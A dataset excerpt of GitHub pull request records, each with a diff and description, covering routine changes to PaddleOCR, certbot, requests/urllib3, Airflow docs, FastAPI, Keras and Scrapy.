title (string, 2–169 chars) | diff (string, 235–19.5k chars) | body (string, 0–30.5k chars) | url (string, 48–84 chars) | created_at (string, 20 chars) | closed_at (string, 20 chars) | merged_at (string, 20 chars) | updated_at (string, 20 chars) | diff_len (float64, 101–3.99k) | repo_name (string, 83 classes) | __index_level_0__ (int64, 15–52.7k)
|---|---|---|---|---|---|---|---|---|---|---|
update test_train_inference_python.sh
|
diff --git a/test_tipc/test_train_inference_python.sh b/test_tipc/test_train_inference_python.sh
index 0d4e182b28..c62b6274f8 100644
--- a/test_tipc/test_train_inference_python.sh
+++ b/test_tipc/test_train_inference_python.sh
@@ -244,7 +244,7 @@ else
export Count=0
USE_GPU_KEY=(${train_use_gpu_value})
for gpu in ${gpu_list[*]}; do
- use_gpu=${USE_GPU_KEY[Count]}
+ train_use_gpu=${USE_GPU_KEY[Count]}
Count=$(($Count + 1))
ips=""
if [ ${gpu} = "-1" ];then
@@ -302,11 +302,20 @@ else
set_pretrain=$(func_set_params "${pretrain_model_key}" "${pretrain_model_value}")
set_batchsize=$(func_set_params "${train_batch_key}" "${train_batch_value}")
set_train_params1=$(func_set_params "${train_param_key1}" "${train_param_value1}")
- set_use_gpu=$(func_set_params "${train_use_gpu_key}" "${use_gpu}")
- save_log="${LOG_PATH}/${trainer}_gpus_${gpu}_autocast_${autocast}"
-
+ set_use_gpu=$(func_set_params "${train_use_gpu_key}" "${train_use_gpu}")
+ if [ ${#ips} -le 26 ];then
+ save_log="${LOG_PATH}/${trainer}_gpus_${gpu}_autocast_${autocast}"
+ nodes=1
+ else
+ IFS=","
+ ips_array=(${ips})
+ IFS="|"
+ nodes=${#ips_array[@]}
+ save_log="${LOG_PATH}/${trainer}_gpus_${gpu}_autocast_${autocast}_nodes_${nodes}"
+ fi
+
# load pretrain from norm training if current trainer is pact or fpgm trainer
- if [ ${trainer} = ${pact_key} ] || [ ${trainer} = ${fpgm_key} ]; then
+ if ([ ${trainer} = ${pact_key} ] || [ ${trainer} = ${fpgm_key} ]) && [ ${nodes} -le 1 ]; then
set_pretrain="${load_norm_train_model}"
fi
@@ -325,7 +334,7 @@ else
set_eval_pretrain=$(func_set_params "${pretrain_model_key}" "${save_log}/${train_model_name}")
# save norm trained models to set pretrain for pact training and fpgm training
- if [ ${trainer} = ${trainer_norm} ]; then
+ if [ ${trainer} = ${trainer_norm} ] && [ ${nodes} -le 1]; then
load_norm_train_model=${set_eval_pretrain}
fi
# run eval
|
1) Rename `use_gpu` -> `train_use_gpu`.
2) Append the node count to the tail of the log name (a sketch of the node-count logic follows).
3) Multi-node training: load the same pretrain model.
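
A rough Python rendition of the node-count logic the shell change adds (names here are illustrative, not part of the script):

```python
# Hypothetical illustration of the node-count logic in the shell diff:
# `ips` is a comma-separated list of node addresses; a short string means a
# single-node run, otherwise the node count is the number of entries.
def count_nodes(ips: str) -> int:
    if len(ips) <= 26:               # mirrors `[ ${#ips} -le 26 ]`
        return 1
    return len(ips.split(","))       # mirrors the IFS="," split

assert count_nodes("") == 1
assert count_nodes("192.168.0.1:8080,192.168.0.2:8080") == 2
```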
|
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/4597
|
2021-11-09T12:28:15Z
|
2021-11-10T06:41:10Z
|
2021-11-10T06:41:09Z
|
2021-11-10T06:41:10Z
| 617
|
PaddlePaddle/PaddleOCR
| 42,533
|
Run tests on apache-parser-v2
|
diff --git a/.travis.yml b/.travis.yml
index 86a475ca8be..baf3856042c 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -16,6 +16,9 @@ before_script:
# is a cap of on the number of simultaneous runs.
branches:
only:
+ # apache-parser-v2 is a temporary branch for doing work related to
+ # rewriting the parser in the Apache plugin.
+ - apache-parser-v2
- master
- /^\d+\.\d+\.x$/
- /^test-.*$/
@@ -24,9 +27,10 @@ branches:
not-on-master: ¬-on-master
if: NOT (type = push AND branch = master)
-# Jobs for the extended test suite are executed for cron jobs and pushes on non-master branches.
+# Jobs for the extended test suite are executed for cron jobs and pushes to
+# non-development branches. See the explanation for apache-parser-v2 above.
extended-test-suite: &extended-test-suite
- if: type = cron OR (type = push AND branch != master)
+ if: type = cron OR (type = push AND branch NOT IN (apache-parser-v2, master))
matrix:
include:
diff --git a/appveyor.yml b/appveyor.yml
index 3d58847f8dd..33f522df138 100644
--- a/appveyor.yml
+++ b/appveyor.yml
@@ -7,6 +7,9 @@ environment:
branches:
only:
+ # apache-parser-v2 is a temporary branch for doing work related to
+ # rewriting the parser in the Apache plugin.
+ - apache-parser-v2
- master
- /^\d+\.\d+\.x$/ # Version branches like X.X.X
- /^test-.*$/
|
We're planning to use the `apache-parser-v2` branch so we can work incrementally on the new Apache parser and feel comfortable landing temporary test code that we don't really want in `master`.
The `apache-parser-v2` branch is created and locked down, but neither Travis nor AppVeyor is configured to run tests on it. See https://github.com/certbot/certbot/pull/7230. This PR fixes that problem.
This could probably just land in the `apache-parser-v2` branch, but why unnecessarily deviate the branch from `master`? It doesn't hurt anything there. Once it lands, I'll get this added to the `apache-parser-v2` branch too.
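
For readability, here is a rough Python rendition of the Travis condition the diff installs for the extended test suite (illustrative only; Travis evaluates the expression itself):

```python
# Illustrative only: how the new Travis `if:` condition for the extended test
# suite evaluates for a given build type and branch.
def runs_extended_suite(build_type: str, branch: str) -> bool:
    return build_type == "cron" or (
        build_type == "push" and branch not in ("apache-parser-v2", "master")
    )

assert runs_extended_suite("cron", "master")
assert not runs_extended_suite("push", "apache-parser-v2")
assert runs_extended_suite("push", "test-foo")
```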
|
https://api.github.com/repos/certbot/certbot/pulls/7231
|
2019-07-10T19:40:52Z
|
2019-07-10T23:30:06Z
|
2019-07-10T23:30:06Z
|
2019-07-10T23:30:09Z
| 408
|
certbot/certbot
| 1,943
|
Updates urllib3 to 528ad3c
|
diff --git a/requests/packages/urllib3/__init__.py b/requests/packages/urllib3/__init__.py
index cdee528c94..4b36b5aeeb 100644
--- a/requests/packages/urllib3/__init__.py
+++ b/requests/packages/urllib3/__init__.py
@@ -57,7 +57,7 @@ def add_stderr_logger(level=logging.DEBUG):
# Set security warning to only go off once by default.
import warnings
-warnings.simplefilter('module', exceptions.InsecureRequestWarning)
+warnings.simplefilter('module', exceptions.SecurityWarning)
def disable_warnings(category=exceptions.HTTPWarning):
"""
diff --git a/requests/packages/urllib3/connection.py b/requests/packages/urllib3/connection.py
index 0d578d773b..c6e1959a2f 100644
--- a/requests/packages/urllib3/connection.py
+++ b/requests/packages/urllib3/connection.py
@@ -1,6 +1,8 @@
+import datetime
import sys
import socket
from socket import timeout as SocketTimeout
+import warnings
try: # Python 3
from http.client import HTTPConnection as _HTTPConnection, HTTPException
@@ -26,6 +28,7 @@ class BaseSSLError(BaseException):
from .exceptions import (
ConnectTimeoutError,
+ SystemTimeWarning,
)
from .packages.ssl_match_hostname import match_hostname
from .packages import six
@@ -45,6 +48,8 @@ class BaseSSLError(BaseException):
'https': 443,
}
+RECENT_DATE = datetime.date(2014, 1, 1)
+
class HTTPConnection(_HTTPConnection, object):
"""
@@ -172,6 +177,7 @@ class VerifiedHTTPSConnection(HTTPSConnection):
cert_reqs = None
ca_certs = None
ssl_version = None
+ assert_fingerprint = None
def set_cert(self, key_file=None, cert_file=None,
cert_reqs=None, ca_certs=None,
@@ -206,6 +212,14 @@ def connect(self):
# Override the host with the one we're requesting data from.
hostname = self._tunnel_host
+ is_time_off = datetime.date.today() < RECENT_DATE
+ if is_time_off:
+ warnings.warn((
+ 'System time is way off (before {0}). This will probably '
+ 'lead to SSL verification errors').format(RECENT_DATE),
+ SystemTimeWarning
+ )
+
# Wrap socket using verification with the root certs in
# trusted_root_certs
self.sock = ssl_wrap_socket(conn, self.key_file, self.cert_file,
@@ -214,15 +228,16 @@ def connect(self):
server_hostname=hostname,
ssl_version=resolved_ssl_version)
- if resolved_cert_reqs != ssl.CERT_NONE:
- if self.assert_fingerprint:
- assert_fingerprint(self.sock.getpeercert(binary_form=True),
- self.assert_fingerprint)
- elif self.assert_hostname is not False:
- match_hostname(self.sock.getpeercert(),
- self.assert_hostname or hostname)
+ if self.assert_fingerprint:
+ assert_fingerprint(self.sock.getpeercert(binary_form=True),
+ self.assert_fingerprint)
+ elif resolved_cert_reqs != ssl.CERT_NONE \
+ and self.assert_hostname is not False:
+ match_hostname(self.sock.getpeercert(),
+ self.assert_hostname or hostname)
- self.is_verified = resolved_cert_reqs == ssl.CERT_REQUIRED
+ self.is_verified = (resolved_cert_reqs == ssl.CERT_REQUIRED
+ or self.assert_fingerprint is not None)
if ssl:
diff --git a/requests/packages/urllib3/connectionpool.py b/requests/packages/urllib3/connectionpool.py
index 9317fdc369..9cc2a95541 100644
--- a/requests/packages/urllib3/connectionpool.py
+++ b/requests/packages/urllib3/connectionpool.py
@@ -718,7 +718,7 @@ def _validate_conn(self, conn):
super(HTTPSConnectionPool, self)._validate_conn(conn)
# Force connect early to allow us to validate the connection.
- if not conn.sock:
+ if not getattr(conn, 'sock', None): # AppEngine might not have `.sock`
conn.connect()
if not conn.is_verified:
diff --git a/requests/packages/urllib3/contrib/pyopenssl.py b/requests/packages/urllib3/contrib/pyopenssl.py
index 7a9ea2e7b9..24de9e4082 100644
--- a/requests/packages/urllib3/contrib/pyopenssl.py
+++ b/requests/packages/urllib3/contrib/pyopenssl.py
@@ -46,8 +46,12 @@
'''
-from ndg.httpsclient.ssl_peer_verification import SUBJ_ALT_NAME_SUPPORT
-from ndg.httpsclient.subj_alt_name import SubjectAltName as BaseSubjectAltName
+try:
+ from ndg.httpsclient.ssl_peer_verification import SUBJ_ALT_NAME_SUPPORT
+ from ndg.httpsclient.subj_alt_name import SubjectAltName as BaseSubjectAltName
+except SyntaxError as e:
+ raise ImportError(e)
+
import OpenSSL.SSL
from pyasn1.codec.der import decoder as der_decoder
from pyasn1.type import univ, constraint
@@ -155,18 +159,24 @@ def get_subj_alt_name(peer_cert):
class WrappedSocket(object):
- '''API-compatibility wrapper for Python OpenSSL's Connection-class.'''
+ '''API-compatibility wrapper for Python OpenSSL's Connection-class.
+
+ Note: _makefile_refs, _drop() and _reuse() are needed for the garbage
+ collector of pypy.
+ '''
def __init__(self, connection, socket, suppress_ragged_eofs=True):
self.connection = connection
self.socket = socket
self.suppress_ragged_eofs = suppress_ragged_eofs
+ self._makefile_refs = 0
def fileno(self):
return self.socket.fileno()
def makefile(self, mode, bufsize=-1):
- return _fileobject(self, mode, bufsize)
+ self._makefile_refs += 1
+ return _fileobject(self, mode, bufsize, close=True)
def recv(self, *args, **kwargs):
try:
@@ -180,7 +190,7 @@ def recv(self, *args, **kwargs):
rd, wd, ed = select.select(
[self.socket], [], [], self.socket.gettimeout())
if not rd:
- raise timeout()
+ raise timeout('The read operation timed out')
else:
return self.recv(*args, **kwargs)
else:
@@ -193,7 +203,10 @@ def sendall(self, data):
return self.connection.sendall(data)
def close(self):
- return self.connection.shutdown()
+ if self._makefile_refs < 1:
+ return self.connection.shutdown()
+ else:
+ self._makefile_refs -= 1
def getpeercert(self, binary_form=False):
x509 = self.connection.get_peer_certificate()
@@ -216,6 +229,15 @@ def getpeercert(self, binary_form=False):
]
}
+ def _reuse(self):
+ self._makefile_refs += 1
+
+ def _drop(self):
+ if self._makefile_refs < 1:
+ self.close()
+ else:
+ self._makefile_refs -= 1
+
def _verify_callback(cnx, x509, err_no, err_depth, return_code):
return err_no == 0
diff --git a/requests/packages/urllib3/exceptions.py b/requests/packages/urllib3/exceptions.py
index fff8bfa5d1..7519ba9805 100644
--- a/requests/packages/urllib3/exceptions.py
+++ b/requests/packages/urllib3/exceptions.py
@@ -60,7 +60,14 @@ class ProtocolError(HTTPError):
## Leaf Exceptions
class MaxRetryError(RequestError):
- "Raised when the maximum number of retries is exceeded."
+ """Raised when the maximum number of retries is exceeded.
+
+ :param pool: The connection pool
+ :type pool: :class:`~urllib3.connectionpool.HTTPConnectionPool`
+ :param string url: The requested Url
+ :param exceptions.Exception reason: The underlying error
+
+ """
def __init__(self, pool, url, reason=None):
self.reason = reason
@@ -134,6 +141,16 @@ def __init__(self, location):
self.location = location
-class InsecureRequestWarning(HTTPWarning):
+class SecurityWarning(HTTPWarning):
+ "Warned when perfoming security reducing actions"
+ pass
+
+
+class InsecureRequestWarning(SecurityWarning):
"Warned when making an unverified HTTPS request."
pass
+
+
+class SystemTimeWarning(SecurityWarning):
+ "Warned when system time is suspected to be wrong"
+ pass
diff --git a/requests/packages/urllib3/response.py b/requests/packages/urllib3/response.py
index 7e0d47faa3..e69de95733 100644
--- a/requests/packages/urllib3/response.py
+++ b/requests/packages/urllib3/response.py
@@ -48,7 +48,10 @@ class HTTPResponse(io.IOBase):
HTTP Response container.
Backwards-compatible to httplib's HTTPResponse but the response ``body`` is
- loaded and decoded on-demand when the ``data`` property is accessed.
+ loaded and decoded on-demand when the ``data`` property is accessed. This
+ class is also compatible with the Python standard library's :mod:`io`
+ module, and can hence be treated as a readable object in the context of that
+ framework.
Extra parameters for behaviour not present in httplib.HTTPResponse:
@@ -317,4 +320,14 @@ def flush(self):
return self._fp.flush()
def readable(self):
+ # This method is required for `io` module compatibility.
return True
+
+ def readinto(self, b):
+ # This method is required for `io` module compatibility.
+ temp = self.read(len(b))
+ if len(temp) == 0:
+ return 0
+ else:
+ b[:len(temp)] = temp
+ return len(temp)
diff --git a/requests/packages/urllib3/util/response.py b/requests/packages/urllib3/util/response.py
index d0325bc6b5..45fff55246 100644
--- a/requests/packages/urllib3/util/response.py
+++ b/requests/packages/urllib3/util/response.py
@@ -5,9 +5,18 @@ def is_fp_closed(obj):
:param obj:
The file-like object to check.
"""
- if hasattr(obj, 'fp'):
- # Object is a container for another file-like object that gets released
- # on exhaustion (e.g. HTTPResponse)
+
+ try:
+ # Check via the official file-like-object way.
+ return obj.closed
+ except AttributeError:
+ pass
+
+ try:
+ # Check if the object is a container for another file-like object that
+ # gets released on exhaustion (e.g. HTTPResponse).
return obj.fp is None
+ except AttributeError:
+ pass
- return obj.closed
+ raise ValueError("Unable to determine whether fp is closed.")
diff --git a/requests/packages/urllib3/util/retry.py b/requests/packages/urllib3/util/retry.py
index 90131977ac..eb560dfc08 100644
--- a/requests/packages/urllib3/util/retry.py
+++ b/requests/packages/urllib3/util/retry.py
@@ -83,7 +83,7 @@ class Retry(object):
same state). See :attr:`Retry.DEFAULT_METHOD_WHITELIST`.
:param iterable status_forcelist:
- A set of HTTP status codes that we should force a retry on.
+ A set of HTTP status codes that we should force a retry on.
By default, this is disabled with ``None``.
|
This includes fixes for pyOpenSSL running under PyPy, so SSL connections can be
made when ndg-httpsclient, pyOpenSSL and pyasn1 are installed.
see also:
- https://github.com/shazow/urllib3/issues/449
- https://github.com/pypa/pip/issues/1988
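
A minimal standalone sketch of the reference-counting close pattern the pyopenssl changes introduce for PyPy's garbage collector (the class and names below are simplified stand-ins, not the real `WrappedSocket`):

```python
# Simplified sketch of the _makefile_refs counting added to WrappedSocket.
# The real class wraps a pyOpenSSL connection; the shutdown is stubbed here.
class RefCountedSocket:
    def __init__(self):
        self._makefile_refs = 0
        self.shut_down = False

    def makefile(self):
        # Each file object created over the socket holds a reference.
        self._makefile_refs += 1

    def close(self):
        # Only shut the connection down once no file objects remain.
        if self._makefile_refs < 1:
            self.shut_down = True
        else:
            self._makefile_refs -= 1

sock = RefCountedSocket()
sock.makefile()
sock.close()            # drops the makefile reference, connection stays open
assert not sock.shut_down
sock.close()            # no references left, connection is shut down
assert sock.shut_down
```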
|
https://api.github.com/repos/psf/requests/pulls/2179
|
2014-08-25T20:47:33Z
|
2014-08-26T19:10:51Z
|
2014-08-26T19:10:51Z
|
2021-09-08T11:00:48Z
| 2,716
|
psf/requests
| 32,572
|
Improve image building documentation for new users
|
diff --git a/docs/apache-airflow-providers/index.rst b/docs/apache-airflow-providers/index.rst
index 7329b7fd780a4..71c5132acdec8 100644
--- a/docs/apache-airflow-providers/index.rst
+++ b/docs/apache-airflow-providers/index.rst
@@ -21,6 +21,8 @@ Provider packages
.. contents:: :local:
+.. _providers:community-maintained-providers:
+
Community maintained providers
''''''''''''''''''''''''''''''
@@ -31,6 +33,9 @@ Those provider packages are separated per-provider (for example ``amazon``, ``go
etc.). Those packages are available as ``apache-airflow-providers`` packages - separately per each provider
(for example there is an ``apache-airflow-providers-amazon`` or ``apache-airflow-providers-google`` package).
+The full list of community managed providers is available at
+`Providers Index <https://airflow.apache.org/docs/#providers-packages-docs-apache-airflow-providers-index-html>`_.
+
You can install those provider packages separately in order to interface with a given service. For those
providers that have corresponding extras, the provider packages (latest version from PyPI) are installed
automatically when Airflow is installed with the extra.
diff --git a/docs/apache-airflow/start/docker-compose.yaml b/docs/apache-airflow/start/docker-compose.yaml
index 95796715fcc85..832092eec9e95 100644
--- a/docs/apache-airflow/start/docker-compose.yaml
+++ b/docs/apache-airflow/start/docker-compose.yaml
@@ -44,7 +44,11 @@
version: '3'
x-airflow-common:
&airflow-common
+ # In order to add custom dependencies or upgrade provider packages you can use your extended image.
+ # Comment the image line, place your Dockerfile in the directory where you placed the docker-compose.yaml
+ # and uncomment the "build" line below, Then run `docker-compose build` to build the images.
image: ${AIRFLOW_IMAGE_NAME:-apache/airflow:|version|}
+ # build: .
environment:
&airflow-common-env
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
@@ -60,7 +64,7 @@ x-airflow-common:
- ./dags:/opt/airflow/dags
- ./logs:/opt/airflow/logs
- ./plugins:/opt/airflow/plugins
- user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
+ user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-0}"
depends_on:
&airflow-common-depends-on
redis:
diff --git a/docs/apache-airflow/start/docker.rst b/docs/apache-airflow/start/docker.rst
index baea8ab2763ee..18fba4314bcef 100644
--- a/docs/apache-airflow/start/docker.rst
+++ b/docs/apache-airflow/start/docker.rst
@@ -81,6 +81,18 @@ If you need install a new Python library or system library, you can :doc:`build
.. _initializing_docker_compose_environment:
+Using custom images
+===================
+
+When you want to run Airflow locally, you might want to use an extended image, containing some additional dependencies - for
+example you might add new python packages, or upgrade airflow providers to a later version. This can be done very easily
+by placing a custom Dockerfile alongside your `docker-compose.yaml`. Then you can use `docker-compose build` command to build your image (you need to
+do it only once). You can also add the `--build` flag to your `docker-compose` commands to rebuild the images
+on-the-fly when you run other `docker-compose` commands.
+
+Examples of how you can extend the image with custom providers, python packages,
+apt packages and more can be found in :doc:`Building the image <docker-stack:build>`.
+
Initializing Environment
========================
diff --git a/docs/docker-stack/build.rst b/docs/docker-stack/build.rst
index 7d89f2fa23adf..c469a35dfc653 100644
--- a/docs/docker-stack/build.rst
+++ b/docs/docker-stack/build.rst
@@ -250,6 +250,19 @@ You should be aware, about a few things:
Examples of image extending
---------------------------
+Example of upgrading Airflow Provider packages
+..............................................
+
+The :ref:`Airflow Providers <providers:community-maintained-providers>` are released independently of core
+Airflow and sometimes you might want to upgrade specific providers only to fix some problems or
+use features available in that provider version. Here is an example of how you can do it
+
+.. exampleinclude:: docker-examples/extending/add-providers/Dockerfile
+ :language: Dockerfile
+ :start-after: [START Dockerfile]
+ :end-before: [END Dockerfile]
+
+
Example of adding ``apt`` package
.................................
diff --git a/docs/docker-stack/docker-examples/extending/add-apt-packages/Dockerfile b/docs/docker-stack/docker-examples/extending/add-apt-packages/Dockerfile
index 62de197973833..f11e87adc666d 100644
--- a/docs/docker-stack/docker-examples/extending/add-apt-packages/Dockerfile
+++ b/docs/docker-stack/docker-examples/extending/add-apt-packages/Dockerfile
@@ -15,7 +15,7 @@
# This is an example Dockerfile. It is not intended for PRODUCTION use
# [START Dockerfile]
-FROM apache/airflow
+FROM apache/airflow:2.1.2
USER root
RUN apt-get update \
&& apt-get install -y --no-install-recommends \
diff --git a/docs/docker-stack/docker-examples/extending/add-build-essential-extend/Dockerfile b/docs/docker-stack/docker-examples/extending/add-build-essential-extend/Dockerfile
index b34fdc9ab3cf8..47ac51ffbe07c 100644
--- a/docs/docker-stack/docker-examples/extending/add-build-essential-extend/Dockerfile
+++ b/docs/docker-stack/docker-examples/extending/add-build-essential-extend/Dockerfile
@@ -15,7 +15,7 @@
# This is an example Dockerfile. It is not intended for PRODUCTION use
# [START Dockerfile]
-FROM apache/airflow
+FROM apache/airflow:2.1.2
USER root
RUN apt-get update \
&& apt-get install -y --no-install-recommends \
diff --git a/docs/docker-stack/docker-examples/extending/add-providers/Dockerfile b/docs/docker-stack/docker-examples/extending/add-providers/Dockerfile
new file mode 100644
index 0000000000000..cdf7a42b0e41b
--- /dev/null
+++ b/docs/docker-stack/docker-examples/extending/add-providers/Dockerfile
@@ -0,0 +1,21 @@
+# Licensed to the Apache Software Foundation (ASF) under one or more
+# contributor license agreements. See the NOTICE file distributed with
+# this work for additional information regarding copyright ownership.
+# The ASF licenses this file to You under the Apache License, Version 2.0
+# (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+# This is an example Dockerfile. It is not intended for PRODUCTION use
+# [START Dockerfile]
+FROM apache/airflow:2.1.2
+RUN pip install --no-cache-dir apache-airflow-providers-docker==2.1.0
+# [END Dockerfile]
+
diff --git a/docs/docker-stack/docker-examples/extending/add-pypi-packages/Dockerfile b/docs/docker-stack/docker-examples/extending/add-pypi-packages/Dockerfile
index cc2559f79d062..310f84cf68dc8 100644
--- a/docs/docker-stack/docker-examples/extending/add-pypi-packages/Dockerfile
+++ b/docs/docker-stack/docker-examples/extending/add-pypi-packages/Dockerfile
@@ -15,6 +15,6 @@
# This is an example Dockerfile. It is not intended for PRODUCTION use
# [START Dockerfile]
-FROM apache/airflow
+FROM apache/airflow:2.1.2
RUN pip install --no-cache-dir lxml
# [END Dockerfile]
diff --git a/docs/docker-stack/docker-examples/extending/embedding-dags/Dockerfile b/docs/docker-stack/docker-examples/extending/embedding-dags/Dockerfile
index c849697859fb2..48701aae23d87 100644
--- a/docs/docker-stack/docker-examples/extending/embedding-dags/Dockerfile
+++ b/docs/docker-stack/docker-examples/extending/embedding-dags/Dockerfile
@@ -15,7 +15,7 @@
# This is an example Dockerfile. It is not intended for PRODUCTION use
# [START Dockerfile]
-FROM apache/airflow
+FROM apache/airflow:2.1.2
COPY --chown=airflow:root test_dag.py /opt/airflow/dags
diff --git a/docs/docker-stack/docker-examples/extending/writable-directory/Dockerfile b/docs/docker-stack/docker-examples/extending/writable-directory/Dockerfile
index ba07f6816888f..8fbb98dfef00c 100644
--- a/docs/docker-stack/docker-examples/extending/writable-directory/Dockerfile
+++ b/docs/docker-stack/docker-examples/extending/writable-directory/Dockerfile
@@ -15,7 +15,7 @@
# This is an example Dockerfile. It is not intended for PRODUCTION use
# [START Dockerfile]
-FROM apache/airflow
+FROM apache/airflow:2.1.2
RUN umask 0002; \
mkdir -p ~/writeable-directory
# [END Dockerfile]
|
This PR improves the documentation for building Airflow images,
specifically targeting users who do not have much experience
building images. It shows examples of how custom image building
can be used to upgrade provider packages, and how image building
can be integrated into the docker-compose quick start.
|
https://api.github.com/repos/apache/airflow/pulls/17409
|
2021-08-04T10:52:46Z
|
2021-08-04T21:07:22Z
|
2021-08-04T21:07:22Z
|
2021-08-04T21:07:23Z
| 2,259
|
apache/airflow
| 14,826
|
🐛 Fix using `Annotated` in routers or path operations decorated multiple times
|
diff --git a/fastapi/dependencies/utils.py b/fastapi/dependencies/utils.py
index c581348c9d26c..f131001ce2c9f 100644
--- a/fastapi/dependencies/utils.py
+++ b/fastapi/dependencies/utils.py
@@ -1,7 +1,7 @@
import dataclasses
import inspect
from contextlib import contextmanager
-from copy import deepcopy
+from copy import copy, deepcopy
from typing import (
Any,
Callable,
@@ -383,7 +383,8 @@ def analyze_param(
), f"Cannot specify multiple `Annotated` FastAPI arguments for {param_name!r}"
fastapi_annotation = next(iter(fastapi_annotations), None)
if isinstance(fastapi_annotation, FieldInfo):
- field_info = fastapi_annotation
+ # Copy `field_info` because we mutate `field_info.default` below.
+ field_info = copy(fastapi_annotation)
assert field_info.default is Undefined or field_info.default is Required, (
f"`{field_info.__class__.__name__}` default value cannot be set in"
f" `Annotated` for {param_name!r}. Set the default value with `=` instead."
diff --git a/tests/test_annotated.py b/tests/test_annotated.py
index 556019897a53e..30c8efe014065 100644
--- a/tests/test_annotated.py
+++ b/tests/test_annotated.py
@@ -1,5 +1,5 @@
import pytest
-from fastapi import FastAPI, Query
+from fastapi import APIRouter, FastAPI, Query
from fastapi.testclient import TestClient
from typing_extensions import Annotated
@@ -224,3 +224,44 @@ def test_get(path, expected_status, expected_response):
response = client.get(path)
assert response.status_code == expected_status
assert response.json() == expected_response
+
+
+def test_multiple_path():
+ @app.get("/test1")
+ @app.get("/test2")
+ async def test(var: Annotated[str, Query()] = "bar"):
+ return {"foo": var}
+
+ response = client.get("/test1")
+ assert response.status_code == 200
+ assert response.json() == {"foo": "bar"}
+
+ response = client.get("/test1", params={"var": "baz"})
+ assert response.status_code == 200
+ assert response.json() == {"foo": "baz"}
+
+ response = client.get("/test2")
+ assert response.status_code == 200
+ assert response.json() == {"foo": "bar"}
+
+ response = client.get("/test2", params={"var": "baz"})
+ assert response.status_code == 200
+ assert response.json() == {"foo": "baz"}
+
+
+def test_nested_router():
+ app = FastAPI()
+
+ router = APIRouter(prefix="/nested")
+
+ @router.get("/test")
+ async def test(var: Annotated[str, Query()] = "bar"):
+ return {"foo": var}
+
+ app.include_router(router)
+
+ client = TestClient(app)
+
+ response = client.get("/nested/test")
+ assert response.status_code == 200
+ assert response.json() == {"foo": "bar"}
|
We need to copy the `field_info` to prevent ourselves from mutating the original. This allows multiple path decorators, nested routers, etc.
Should resolve these discussions:
https://github.com/tiangolo/fastapi/discussions/9279
https://github.com/tiangolo/fastapi/discussions/9309
https://github.com/tiangolo/fastapi/discussions/9306
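
A minimal usage sketch of the case this fixes, mirroring the `test_multiple_path` test added in the diff: one function registered under two paths, sharing a single `Annotated` query parameter.

```python
# Mirrors the added test: the shared Annotated default must survive being
# processed by two path decorators on the same function.
from fastapi import FastAPI, Query
from fastapi.testclient import TestClient
from typing_extensions import Annotated

app = FastAPI()

@app.get("/test1")
@app.get("/test2")
async def read_item(var: Annotated[str, Query()] = "bar"):
    return {"foo": var}

client = TestClient(app)
assert client.get("/test1").json() == {"foo": "bar"}
assert client.get("/test2", params={"var": "baz"}).json() == {"foo": "baz"}
```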
|
https://api.github.com/repos/tiangolo/fastapi/pulls/9315
|
2023-03-26T11:42:57Z
|
2023-04-13T17:49:23Z
|
2023-04-13T17:49:23Z
|
2023-04-13T20:43:06Z
| 725
|
tiangolo/fastapi
| 23,048
|
call : remove train arg from doc string
|
diff --git a/keras/engine/topology.py b/keras/engine/topology.py
index a6d3d08aa68..aa74db292c9 100644
--- a/keras/engine/topology.py
+++ b/keras/engine/topology.py
@@ -409,8 +409,6 @@ def call(self, x, mask=None):
# Arguments
x: input tensor, or list/tuple of input tensors.
- train: boolean, whether the layer should behave
- in train behavior (e.g. dropout on) or test behavior.
mask: a masking tensor (or list of tensors). Used mainly in RNNs.
# Returns:
|
https://api.github.com/repos/keras-team/keras/pulls/2235
|
2016-04-08T10:10:07Z
|
2016-04-08T15:59:56Z
|
2016-04-08T15:59:56Z
|
2016-08-09T22:05:59Z
| 151
|
keras-team/keras
| 47,768
|
|
[HttpCompressionMiddleware] fix delimiter for Accept-Encoding header
|
diff --git a/scrapy/downloadermiddlewares/httpcompression.py b/scrapy/downloadermiddlewares/httpcompression.py
index 65b65295365..0010b2a8f2a 100644
--- a/scrapy/downloadermiddlewares/httpcompression.py
+++ b/scrapy/downloadermiddlewares/httpcompression.py
@@ -26,7 +26,7 @@ def from_crawler(cls, crawler):
def process_request(self, request, spider):
request.headers.setdefault('Accept-Encoding',
- b",".join(ACCEPTED_ENCODINGS))
+ b", ".join(ACCEPTED_ENCODINGS))
def process_response(self, request, response, spider):
diff --git a/tests/test_downloadermiddleware_httpcompression.py b/tests/test_downloadermiddleware_httpcompression.py
index c6a823b535c..64488841a29 100644
--- a/tests/test_downloadermiddleware_httpcompression.py
+++ b/tests/test_downloadermiddleware_httpcompression.py
@@ -48,7 +48,7 @@ def _getresponse(self, coding):
}
response = Response('http://scrapytest.org/', body=body, headers=headers)
- response.request = Request('http://scrapytest.org', headers={'Accept-Encoding': 'gzip,deflate'})
+ response.request = Request('http://scrapytest.org', headers={'Accept-Encoding': 'gzip, deflate'})
return response
def test_process_request(self):
@@ -56,7 +56,7 @@ def test_process_request(self):
assert 'Accept-Encoding' not in request.headers
self.mw.process_request(request, self.spider)
self.assertEqual(request.headers.get('Accept-Encoding'),
- b','.join(ACCEPTED_ENCODINGS))
+ b', '.join(ACCEPTED_ENCODINGS))
def test_process_response_gzip(self):
response = self._getresponse('gzip')
|
The Accept-Encoding header should use `, ` (with a space) as the delimiter between encodings instead of `,` (without a space), per https://tools.ietf.org/html/rfc2616#section-14.3.
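
A tiny illustration of the change (the real middleware joins the bytes in `ACCEPTED_ENCODINGS`; the list below is an illustrative subset):

```python
# The middleware joins the accepted encodings into the Accept-Encoding header;
# with the fix the delimiter includes a space, matching the RFC 2616 examples.
ACCEPTED_ENCODINGS = [b"gzip", b"deflate"]  # illustrative subset
assert b",".join(ACCEPTED_ENCODINGS) == b"gzip,deflate"    # old behaviour
assert b", ".join(ACCEPTED_ENCODINGS) == b"gzip, deflate"  # new behaviour
```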
|
https://api.github.com/repos/scrapy/scrapy/pulls/4293
|
2020-01-29T13:06:55Z
|
2020-01-29T19:19:41Z
|
2020-01-29T19:19:41Z
